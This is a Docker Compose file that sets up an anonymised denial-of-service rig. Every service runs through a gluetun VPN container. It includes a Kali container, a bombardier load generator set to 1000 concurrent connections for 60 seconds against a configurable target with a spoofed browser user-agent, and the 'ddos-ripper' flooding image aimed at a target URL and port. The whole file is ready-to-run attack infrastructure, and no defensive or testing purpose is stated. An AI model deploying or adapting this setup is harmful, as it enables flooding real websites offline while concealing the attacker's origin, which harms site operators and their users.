version: "3"
services:
  kali:
    build: ./kali
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  test:
    image: alpine/curl:3.14
    network_mode: "service:vpn"
    command: "curl ipinfo.io"
    depends_on: 
      - vpn
  bombardier:
    image: alpine/bombardier
    command: "-k -H \"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\" -c 1000 -d 60s -l ${B_TARGET_URL}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  ddosripper:
    image: nitupkcuf/ddos-ripper:latest
    command: "${R_TARGET_URL} ${TARGET_PORT}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
    volumes:
      - ./ddosripper/docker_entrypoint.sh:/app/docker_entrypoint.sh
    entrypoint: 
      - /app/docker_entrypoint.sh
  checksites:
    image: loginincorrect/checksites
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  vpn:
    image: qmcgaw/gluetun
    cap_add:
      - NET_ADMIN
    devices:
      - /dev/net/tun
    privileged: true
    tty: true
    environment:
      - VPN_SERVICE_PROVIDER=${VPN_TYPE}
      - OPENVPN_USER=${VPN_USER}
      - OPENVPN_PASSWORD=${VPN_CODE}
      - SERVER_COUNTRIES=${VPN_COUNTRY}
    volumes: 
        - ./gluetun:/gluetun
    deploy:
      restart_policy:
        condition: on-failure
        max_attempts: 300